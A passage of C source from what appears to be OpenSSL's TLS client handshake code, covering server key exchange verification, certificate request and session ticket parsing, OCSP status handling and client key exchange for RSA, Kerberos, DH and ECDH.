* Keep accumulating lengths of various components in
* param_len and make sure it never exceeds n.
*/
/* XXX: For now we only support named (not generic) curves
* and the ECParameters in this case is just three bytes. We
* also need one byte for the length of the encoded point
*/
param_len=4;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
/* Check the curve is one of our preferences; if not, the server has
* sent an invalid curve. ECParameters is 3 bytes.
*/
if (!tls1_check_curve(s, p, 3))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_WRONG_CURVE);
goto f_err;
}
if ((curve_nid = tls1_ec_curve_id2nid(*(p + 2))) == 0)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_UNABLE_TO_FIND_ECDH_PARAMETERS);
goto f_err;
}
ngroup = EC_GROUP_new_by_curve_name(curve_nid);
if (ngroup == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
if (EC_KEY_set_group(ecdh, ngroup) == 0)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
EC_GROUP_free(ngroup);
group = EC_KEY_get0_group(ecdh);
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
(EC_GROUP_get_degree(group) > 163))
{
al=SSL_AD_EXPORT_RESTRICTION;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
goto f_err;
}
p+=3;
/* Next, get the encoded ECPoint */
if (((srvr_ecpoint = EC_POINT_new(group)) == NULL) ||
((bn_ctx = BN_CTX_new()) == NULL))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
encoded_pt_len = *p; /* length of encoded point */
p+=1;
if ((encoded_pt_len > n - param_len) ||
(EC_POINT_oct2point(group, srvr_ecpoint,
p, encoded_pt_len, bn_ctx) == 0))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_ECPOINT);
goto f_err;
}
param_len += encoded_pt_len;
n-=param_len;
p+=encoded_pt_len;
/* The ECC/TLS specification does not mention
* the use of DSA to sign ECParameters in the server
* key exchange message. We do support RSA and ECDSA.
*/
if (0) ;
#ifndef OPENSSL_NO_RSA
else if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#endif
#ifndef OPENSSL_NO_ECDSA
else if (alg_a & SSL_aECDSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_ECC].x509);
#endif
/* else anonymous ECDH, so no certificate or pkey. */
EC_KEY_set_public_key(ecdh, srvr_ecpoint);
s->session->sess_cert->peer_ecdh_tmp=ecdh;
ecdh=NULL;
BN_CTX_free(bn_ctx);
bn_ctx = NULL;
EC_POINT_free(srvr_ecpoint);
srvr_ecpoint = NULL;
}
else if (alg_k)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_UNEXPECTED_MESSAGE);
goto f_err;
}
#endif /* !OPENSSL_NO_ECDH */
/* p points to the next byte, there are 'n' bytes left */
/* if it was signed, check the signature */
if (pkey != NULL)
{
if (SSL_USE_SIGALGS(s))
{
int rv;
if (2 > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
goto err;
else if (rv == 0)
{
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
else
md = EVP_sha1();
if (2 > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
n-=2;
j=EVP_PKEY_size(pkey);
/* Check signature length. If n is 0 then signature is empty */
if ((i != n) || (n > j) || (n <= 0))
{
/* wrong packet length */
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_WRONG_SIGNATURE_LENGTH);
goto f_err;
}
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s))
{
int num;
unsigned int size;
j=0;
q=md_buf;
for (num=2; num > 0; num--)
{
EVP_MD_CTX_set_flags(&md_ctx,
EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
EVP_DigestInit_ex(&md_ctx,(num == 2)
?s->ctx->md5:s->ctx->sha1, NULL);
EVP_DigestUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,param,param_len);
EVP_DigestFinal_ex(&md_ctx,q,&size);
q+=size;
j+=size;
}
i=RSA_verify(NID_md5_sha1, md_buf, j, p, n,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#endif
{
EVP_VerifyInit_ex(&md_ctx, md, NULL);
EVP_VerifyUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_VerifyUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_VerifyUpdate(&md_ctx,param,param_len);
if (EVP_VerifyFinal(&md_ctx,p,(int)n,pkey) <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
}
else
{
/* aNULL, aSRP or kPSK do not need public keys */
if (!(alg_a & (SSL_aNULL|SSL_aSRP)) && !(alg_k & SSL_kPSK))
{
/* Might be wrong key type, check it */
if (ssl3_check_cert_and_algorithm(s))
/* Otherwise this shouldn't happen */
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
/* still data left over */
if (n != 0)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_EXTRA_DATA_IN_MESSAGE);
goto f_err;
}
}
EVP_PKEY_free(pkey);
EVP_MD_CTX_cleanup(&md_ctx);
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
EVP_PKEY_free(pkey);
#ifndef OPENSSL_NO_RSA
if (rsa != NULL)
RSA_free(rsa);
#endif
#ifndef OPENSSL_NO_DH
if (dh != NULL)
DH_free(dh);
#endif
#ifndef OPENSSL_NO_ECDH
BN_CTX_free(bn_ctx);
EC_POINT_free(srvr_ecpoint);
if (ecdh != NULL)
EC_KEY_free(ecdh);
#endif
EVP_MD_CTX_cleanup(&md_ctx);
return(-1);
}
int ssl3_get_certificate_request(SSL *s)
{
int ok,ret=0;
unsigned long n,nc,l;
unsigned int llen, ctype_num,i;
X509_NAME *xn=NULL;
const unsigned char *p,*q;
unsigned char *d;
STACK_OF(X509_NAME) *ca_sk=NULL;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_CERT_REQ_A,
SSL3_ST_CR_CERT_REQ_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
s->s3->tmp.cert_req=0;
if (s->s3->tmp.message_type == SSL3_MT_SERVER_DONE)
{
s->s3->tmp.reuse_message=1;
/* If we get here we don't need any cached handshake records
* as we won't be doing client auth.
*/
if (s->s3->handshake_buffer)
{
if (!ssl3_digest_cached_records(s))
goto err;
}
return(1);
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_REQUEST)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_UNEXPECTED_MESSAGE);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_WRONG_MESSAGE_TYPE);
goto err;
}
/* TLS does not like anon-DH with client cert */
if (s->version > SSL3_VERSION)
{
if (s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_UNEXPECTED_MESSAGE);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_TLS_CLIENT_CERT_REQ_WITH_ANON_CIPHER);
goto err;
}
}
p=d=(unsigned char *)s->init_msg;
if ((ca_sk=sk_X509_NAME_new(ca_dn_cmp)) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,ERR_R_MALLOC_FAILURE);
goto err;
}
/* get the certificate types */
ctype_num= *(p++);
if (s->cert->ctypes)
{
OPENSSL_free(s->cert->ctypes);
s->cert->ctypes = NULL;
}
if (ctype_num > SSL3_CT_NUMBER)
{
/* If we exceed static buffer copy all to cert structure */
s->cert->ctypes = OPENSSL_malloc(ctype_num);
if (s->cert->ctypes == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,ERR_R_MALLOC_FAILURE);
goto err;
}
memcpy(s->cert->ctypes, p, ctype_num);
s->cert->ctype_num = (size_t)ctype_num;
ctype_num=SSL3_CT_NUMBER;
}
for (i=0; i<ctype_num; i++)
s->s3->tmp.ctype[i]= p[i];
p+=p[-1];
if (SSL_USE_SIGALGS(s))
{
n2s(p, llen);
/* Check we have enough room for signature algorithms and
* following length value.
*/
if ((unsigned long)(p - d + llen + 2) > n)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
/* Clear certificate digests and validity flags */
for (i = 0; i < SSL_PKEY_NUM; i++)
{
s->cert->pkeys[i].digest = NULL;
s->cert->pkeys[i].valid_flags = 0;
}
if ((llen & 1) || !tls1_save_sigalgs(s, p, llen))
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_SIGNATURE_ALGORITHMS_ERROR);
goto err;
}
if (!tls1_process_sigalgs(s))
{
ssl3_send_alert(s,SSL3_AL_FATAL, SSL_AD_INTERNAL_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST, ERR_R_MALLOC_FAILURE);
goto err;
}
p += llen;
}
/* get the CA RDNs */
n2s(p,llen);
#if 0
{
FILE *out;
out=fopen("/tmp/vsign.der","w");
fwrite(p,1,llen,out);
fclose(out);
}
#endif
if ((unsigned long)(p - d + llen) != n)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_LENGTH_MISMATCH);
goto err;
}
for (nc=0; nc<llen; )
{
n2s(p,l);
if ((l+nc+2) > llen)
{
if ((s->options & SSL_OP_NETSCAPE_CA_DN_BUG))
goto cont; /* netscape bugs */
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_CA_DN_TOO_LONG);
goto err;
}
q=p;
if ((xn=d2i_X509_NAME(NULL,&q,l)) == NULL)
{
/* If netscape tolerance is on, ignore errors */
if (s->options & SSL_OP_NETSCAPE_CA_DN_BUG)
goto cont;
else
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,ERR_R_ASN1_LIB);
goto err;
}
}
if (q != (p+l))
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_CA_DN_LENGTH_MISMATCH);
goto err;
}
if (!sk_X509_NAME_push(ca_sk,xn))
{
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,ERR_R_MALLOC_FAILURE);
goto err;
}
p+=l;
nc+=l+2;
}
if (0)
{
cont:
ERR_clear_error();
}
/* we should setup a certificate to return.... */
s->s3->tmp.cert_req=1;
s->s3->tmp.ctype_num=ctype_num;
if (s->s3->tmp.ca_names != NULL)
sk_X509_NAME_pop_free(s->s3->tmp.ca_names,X509_NAME_free);
s->s3->tmp.ca_names=ca_sk;
ca_sk=NULL;
ret=1;
err:
if (ca_sk != NULL) sk_X509_NAME_pop_free(ca_sk,X509_NAME_free);
return(ret);
}
static int ca_dn_cmp(const X509_NAME * const *a, const X509_NAME * const *b)
{
return(X509_NAME_cmp(*a,*b));
}
#ifndef OPENSSL_NO_TLSEXT
int ssl3_get_new_session_ticket(SSL *s)
{
int ok,al,ret=0, ticklen;
long n;
const unsigned char *p;
unsigned char *d;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_SESSION_TICKET_A,
SSL3_ST_CR_SESSION_TICKET_B,
SSL3_MT_NEWSESSION_TICKET,
16384,
&ok);
if (!ok)
return((int)n);
if (n < 6)
{
/* need at least ticket_lifetime_hint + ticket length */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
p=d=(unsigned char *)s->init_msg;
n2l(p, s->session->tlsext_tick_lifetime_hint);
n2s(p, ticklen);
/* ticket_lifetime_hint + ticket_length + ticket */
if (ticklen + 6 != n)
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
if (s->session->tlsext_tick)
{
OPENSSL_free(s->session->tlsext_tick);
s->session->tlsext_ticklen = 0;
}
s->session->tlsext_tick = OPENSSL_malloc(ticklen);
if (!s->session->tlsext_tick)
{
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET,ERR_R_MALLOC_FAILURE);
goto err;
}
memcpy(s->session->tlsext_tick, p, ticklen);
s->session->tlsext_ticklen = ticklen;
/* There are two ways to detect a resumed ticket session.
* One is to set an appropriate session ID and then the server
* must return a match in ServerHello. This allows the normal
* client session ID matching to work and we know much
* earlier that the ticket has been accepted.
*
* The other way is to set zero length session ID when the
* ticket is presented and rely on the handshake to determine
* session resumption.
*
* We choose the former approach because this fits in with
* assumptions elsewhere in OpenSSL. The session ID is set
* to the SHA256 (or SHA1 if SHA256 is disabled) hash of the
* ticket.
*/
EVP_Digest(p, ticklen,
s->session->session_id, &s->session->session_id_length,
#ifndef OPENSSL_NO_SHA256
EVP_sha256(), NULL);
#else
EVP_sha1(), NULL);
#endif
ret=1;
return(ret);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
return(-1);
}
int ssl3_get_cert_status(SSL *s)
{
int ok, al;
unsigned long resplen,n;
const unsigned char *p;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_CERT_STATUS_A,
SSL3_ST_CR_CERT_STATUS_B,
SSL3_MT_CERTIFICATE_STATUS,
16384,
&ok);
if (!ok) return((int)n);
if (n < 4)
{
/* need at least status type + length */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
p = (unsigned char *)s->init_msg;
if (*p++ != TLSEXT_STATUSTYPE_ocsp)
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,SSL_R_UNSUPPORTED_STATUS_TYPE);
goto f_err;
}
n2l3(p, resplen);
if (resplen + 4 != n)
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
if (s->tlsext_ocsp_resp)
OPENSSL_free(s->tlsext_ocsp_resp);
s->tlsext_ocsp_resp = BUF_memdup(p, resplen);
if (!s->tlsext_ocsp_resp)
{
al = SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,ERR_R_MALLOC_FAILURE);
goto f_err;
}
s->tlsext_ocsp_resplen = resplen;
if (s->ctx->tlsext_status_cb)
{
int ret;
ret = s->ctx->tlsext_status_cb(s, s->ctx->tlsext_status_arg);
if (ret == 0)
{
al = SSL_AD_BAD_CERTIFICATE_STATUS_RESPONSE;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,SSL_R_INVALID_STATUS_RESPONSE);
goto f_err;
}
if (ret < 0)
{
al = SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,ERR_R_MALLOC_FAILURE);
goto f_err;
}
}
return 1;
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
return(-1);
}
#endif
int ssl3_get_server_done(SSL *s)
{
int ok,ret=0;
long n;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_SRVR_DONE_A,
SSL3_ST_CR_SRVR_DONE_B,
SSL3_MT_SERVER_DONE,
30, /* should be very small, like 0 :-) */
&ok);
if (!ok) return((int)n);
if (n > 0)
{
/* should contain no data */
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_SERVER_DONE,SSL_R_LENGTH_MISMATCH);
return -1;
}
ret=1;
return(ret);
}
int ssl3_send_client_key_exchange(SSL *s)
{
unsigned char *p;
int n;
unsigned long alg_k;
#ifndef OPENSSL_NO_RSA
unsigned char *q;
EVP_PKEY *pkey=NULL;
#endif
#ifndef OPENSSL_NO_KRB5
KSSL_ERR kssl_err;
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
EC_KEY *clnt_ecdh = NULL;
const EC_POINT *srvr_ecpoint = NULL;
EVP_PKEY *srvr_pub_pkey = NULL;
unsigned char *encodedPoint = NULL;
int encoded_pt_len = 0;
BN_CTX * bn_ctx = NULL;
#endif
if (s->state == SSL3_ST_CW_KEY_EXCH_A)
{
p = ssl_handshake_start(s);
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
/* Fool emacs indentation */
if (0) {}
#ifndef OPENSSL_NO_RSA
else if (alg_k & SSL_kRSA)
{
RSA *rsa;
unsigned char tmp_buf[SSL_MAX_MASTER_KEY_LENGTH];
if (s->session->sess_cert == NULL)
{
/* We should always have a server certificate with SSL_kRSA. */
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
if (s->session->sess_cert->peer_rsa_tmp != NULL)
rsa=s->session->sess_cert->peer_rsa_tmp;
else
{
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
if ((pkey == NULL) ||
(pkey->type != EVP_PKEY_RSA) ||
(pkey->pkey.rsa == NULL))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
rsa=pkey->pkey.rsa;
EVP_PKEY_free(pkey);
}
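/* The RSA premaster secret (RFC 5246, 7.4.7.1) is 48 bytes: the 2-byte
* client_version followed by 46 random bytes. That is what tmp_buf is
* filled with below before being encrypted under the server's RSA key.
*/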
tmp_buf[0]=s->client_version>>8;
tmp_buf[1]=s->client_version&0xff;
if (RAND_bytes(&(tmp_buf[2]),sizeof tmp_buf-2) <= 0)
goto err;
s->session->master_key_length=sizeof tmp_buf;
q=p;
/* Fix buf for TLS and beyond */
if (s->version > SSL3_VERSION)
p+=2;
n=RSA_public_encrypt(sizeof tmp_buf,
tmp_buf,p,rsa,RSA_PKCS1_PADDING);
#ifdef PKCS1_CHECK
if (s->options & SSL_OP_PKCS1_CHECK_1) p[1]++;
if (s->options & SSL_OP_PKCS1_CHECK_2) tmp_buf[0]=0x70;
#endif
if (n <= 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,SSL_R_BAD_RSA_ENCRYPT);
goto err;
}
/* Fix buf for TLS and beyond */
if (s->version > SSL3_VERSION)
{
s2n(n,q);
n+=2;
}
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
tmp_buf,sizeof tmp_buf);
OPENSSL_cleanse(tmp_buf,sizeof tmp_buf);
}
#endif
#ifndef OPENSSL_NO_KRB5
else if (alg_k & SSL_kKRB5)
{
krb5_error_code krb5rc;
KSSL_CTX *kssl_ctx = s->kssl_ctx;
/* krb5_data krb5_ap_req; */
krb5_data *enc_ticket;
krb5_data authenticator, *authp = NULL;
EVP_CIPHER_CTX ciph_ctx;
const EVP_CIPHER *enc = NULL;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char tmp_buf[SSL_MAX_MASTER_KEY_LENGTH];
unsigned char epms[SSL_MAX_MASTER_KEY_LENGTH
+ EVP_MAX_IV_LENGTH];
int padl, outl = sizeof(epms);
EVP_CIPHER_CTX_init(&ciph_ctx);
#ifdef KSSL_DEBUG
fprintf(stderr,"ssl3_send_client_key_exchange(%lx & %lx)\n",
alg_k, SSL_kKRB5);
#endif /* KSSL_DEBUG */
authp = NULL;
#ifdef KRB5SENDAUTH
if (KRB5SENDAUTH) authp = &authenticator;
#endif /* KRB5SENDAUTH */
krb5rc = kssl_cget_tkt(kssl_ctx, &enc_ticket, authp,
&kssl_err);
enc = kssl_map_enc(kssl_ctx->enctype);
if (enc == NULL)
goto err;
#ifdef KSSL_DEBUG
{
fprintf(stderr,"kssl_cget_tkt rtn %d\n", krb5rc);
if (krb5rc && kssl_err.text)
fprintf(stderr,"kssl_cget_tkt kssl_err=%s\n", kssl_err.text);
}
#endif /* KSSL_DEBUG */
if (krb5rc)
{
ssl3_send_alert(s,SSL3_AL_FATAL,
SSL_AD_HANDSHAKE_FAILURE);
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
/*-
* 20010406 VRS - Earlier versions used KRB5 AP_REQ
* in place of RFC 2712 KerberosWrapper, as in:
*
* Send ticket (copy to *p, set n = length)
* n = krb5_ap_req.length;
* memcpy(p, krb5_ap_req.data, krb5_ap_req.length);
* if (krb5_ap_req.data)
* kssl_krb5_free_data_contents(NULL,&krb5_ap_req);
*
* Now using real RFC 2712 KerberosWrapper
* (Thanks to Simon Wilkinson <sxw@sxw.org.uk>)
* Note: 2712 "opaque" types are here replaced
* with a 2-byte length followed by the value.
* Example:
* KerberosWrapper= xx xx asn1ticket 0 0 xx xx encpms
* Where "xx xx" = length bytes. Shown here with
* optional authenticator omitted.
*/
/* KerberosWrapper.Ticket */
s2n(enc_ticket->length,p);
memcpy(p, enc_ticket->data, enc_ticket->length);
p+= enc_ticket->length;
n = enc_ticket->length + 2;
/* KerberosWrapper.Authenticator */
if (authp && authp->length)
{
s2n(authp->length,p);
memcpy(p, authp->data, authp->length);
p+= authp->length;
n+= authp->length + 2;
free(authp->data);
authp->data = NULL;
authp->length = 0;
}
else
{
s2n(0,p);/* null authenticator length */
n+=2;
}
tmp_buf[0]=s->client_version>>8;
tmp_buf[1]=s->client_version&0xff;
if (RAND_bytes(&(tmp_buf[2]),sizeof tmp_buf-2) <= 0)
goto err;
/*-
* 20010420 VRS. Tried it this way; failed.
* EVP_EncryptInit_ex(&ciph_ctx,enc, NULL,NULL);
* EVP_CIPHER_CTX_set_key_length(&ciph_ctx,
* kssl_ctx->length);
* EVP_EncryptInit_ex(&ciph_ctx,NULL, key,iv);
*/
memset(iv, 0, sizeof iv); /* per RFC 1510 */
EVP_EncryptInit_ex(&ciph_ctx,enc, NULL,
kssl_ctx->key,iv);
EVP_EncryptUpdate(&ciph_ctx,epms,&outl,tmp_buf,
sizeof tmp_buf);
EVP_EncryptFinal_ex(&ciph_ctx,&(epms[outl]),&padl);
outl += padl;
if (outl > (int)sizeof epms)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
EVP_CIPHER_CTX_cleanup(&ciph_ctx);
/* KerberosWrapper.EncryptedPreMasterSecret */
s2n(outl,p);
memcpy(p, epms, outl);
p+=outl;
n+=outl + 2;
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
tmp_buf, sizeof tmp_buf);
OPENSSL_cleanse(tmp_buf, sizeof tmp_buf);
OPENSSL_cleanse(epms, outl);
}
#endif
#ifndef OPENSSL_NO_DH
else if (alg_k & (SSL_kDHE|SSL_kDHr|SSL_kDHd))
{
DH *dh_srvr,*dh_clnt;
SESS_CERT *scert = s->session->sess_cert;
if (scert == NULL)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_UNEXPECTED_MESSAGE);
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,SSL_R_UNEXPECTED_MESSAGE);
goto err;
}
if (scert->peer_dh_tmp != NULL)
dh_srvr=scert->peer_dh_tmp;
else
{
/* we get them from the cert */
int idx = scert->peer_cert_type;
EVP_PKEY *spkey = NULL;
dh_srvr = NULL;
if (idx >= 0)
spkey = X509_get_pubkey(
scert->peer_pkeys[idx].x509);
if (spkey)
{
dh_srvr = EVP_PKEY_get1_DH(spkey);
EVP_PKEY_free(spkey);
}
if (dh_srvr == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
}
if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY)
{
/* Use client certificate key */
EVP_PKEY *clkey = s->cert->key->privatekey;
dh_clnt = NULL;
if (clkey)
dh_clnt = EVP_PKEY_get1_DH(clkey);
if (dh_clnt == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
}
else
{
/* generate a new random key */
if ((dh_clnt=DHparams_dup(dh_srvr)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
if (!DH_generate_key(dh_clnt))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
DH_free(dh_clnt);
goto err;
}
}
/* use the 'p' output buffer for the DH key, but
* make sure to clear it out afterwards */
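/* DH_compute_key() writes the raw shared secret Z into 'p'; for the DH
* key exchange that value is used directly as the premaster secret fed
* to generate_master_secret() and is wiped immediately afterwards.
*/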
n=DH_compute_key(p,dh_srvr->pub_key,dh_clnt);
if (scert->peer_dh_tmp == NULL)
DH_free(dh_srvr);
if (n <= 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
DH_free(dh_clnt);
goto err;
}
/* generate master key from the result */
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,p,n);
/* clean up */
memset(p,0,n);
if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY)
n = 0;
else
{
/* send off the data */
n=BN_num_bytes(dh_clnt->pub_key);
s2n(n,p);
BN_bn2bin(dh_clnt->pub_key,p);
n+=2;
}
DH_free(dh_clnt);
/* perhaps clean things up a bit EAY EAY EAY EAY*/
}
#endif
#ifndef OPENSSL_NO_ECDH
else if (alg_k & (SSL_kECDHE|SSL_kECDHr|SSL_kECDHe))
{
const EC_GROUP *srvr_group = NULL;
EC_KEY *tkey;
int ecdh_clnt_cert = 0;
int field_size = 0;
if (s->session->sess_cert == NULL)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_UNEXPECTED_MESSAGE);
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,SSL_R_UNEXPECTED_MESSAGE);
goto err;
}
/* Did we send out the client's
* ECDH share for use in premaster
* computation as part of client certificate?
* If so, set ecdh_clnt_cert to 1.
*/
if ((alg_k & (SSL_kECDHr|SSL_kECDHe)) && (s->cert != NULL))
{
/*-
* XXX: For now, we do not support client
* authentication using ECDH certificates.
* To add such support, one needs to add
* code that checks for appropriate
* conditions and sets ecdh_clnt_cert to 1.
* For example, the cert must have an ECC
* key on the same curve as the server's
* and the key should be authorized for
* key agreement.
*
* One also needs to add code in ssl3_connect
* to skip sending the certificate verify
* message.
*
* if ((s->cert->key->privatekey != NULL) &&
* (s->cert->key->privatekey->type ==
* EVP_PKEY_EC) && ...)
* ecdh_clnt_cert = 1;
*/
}
if (s->session->sess_cert->peer_ecdh_tmp != NULL)
{
tkey = s->session->sess_cert->peer_ecdh_tmp;
}
else
{
/* Get the Server Public Key from Cert */
srvr_pub_pkey = X509_get_pubkey(s->session-> \
sess_cert->peer_pkeys[SSL_PKEY_ECC].x509);
if ((srvr_pub_pkey == NULL) ||
(srvr_pub_pkey->type != EVP_PKEY_EC) ||
(srvr_pub_pkey->pkey.ec == NULL))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
tkey = srvr_pub_pkey->pkey.ec;
}
srvr_group = EC_KEY_get0_group(tkey);
srvr_ecpoint = EC_KEY_get0_public_key(tkey);
if ((srvr_group == NULL) || (srvr_ecpoint == NULL))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
